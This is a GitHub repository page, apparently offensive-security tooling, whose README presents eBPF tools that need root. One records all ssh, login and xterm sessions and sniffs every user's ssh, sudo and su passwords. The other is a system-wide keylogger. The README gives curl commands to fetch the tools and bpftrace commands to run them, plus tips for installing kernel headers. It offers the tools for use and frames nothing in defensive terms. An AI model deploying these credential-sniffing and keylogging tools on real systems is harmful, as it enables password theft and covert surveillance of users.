Skip to content

hackerschoice/bpfhacks

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

32 Commits
README.md
README.md
 
 
keylogger.bt
keylogger.bt
 
 
ptysnoop.bt
ptysnoop.bt
 
 
ptysnoop_linux_old.bt
ptysnoop_linux_old.bt
 
 

Repository files navigation

eBPF tools

A (short) collecton of eBPF enabled tools (need root privileges to run);

Prerequisite: Install the latest bpftrace tool:

curl -o bpftrace -fsSL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace
chmod 755 bpftrace

Project #1 - Sniff all ssh/login/xterm session:

Record all PTY sessions and sniffs all ssh/sudo/su passwords of all users.

curl -o ptysnoop.bt -fsSL https://github.com/hackerschoice/bpfhacks/raw/main/ptysnoop.bt
export BPFTRACE_MAX_STRLEN=200
./bpftrace -Bnone ptysnoop.bt

ptysnoop

Tools by others: SSHLog.

Project #2 - Keylogger:

Record all keys pressed on the keyboard:

./bpftrace -Bnone keylogger.bt

keuylogger

TIPS & TRICKS

It may complain about missing Linux Kernel header files. Download them to a local directory:

wget https://debian.sipwise.com/debian-security/pool/main/l/linux/linux-headers-...
dpkg-deb -xv linux-headers-*.deb "$(pwd)"
export BPFTRACE_KERNEL_SOURCE="$(echo "$(pwd)/usr/src/linux-headers-"*)"
sed '/generated\/autoconf.h/d' -i "${BPFTRACE_KERNEL_SOURCE}/include/linux/kconfig.h"

Check for BPF support in the Kernel (it is enabled by default):

grep CONFIG_BPF /boot/config-$(uname -r)

About

eBPF hacks

Resources

Readme
Activity
Custom properties

Stars

173 stars

Watchers

2 watching

Forks

13 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2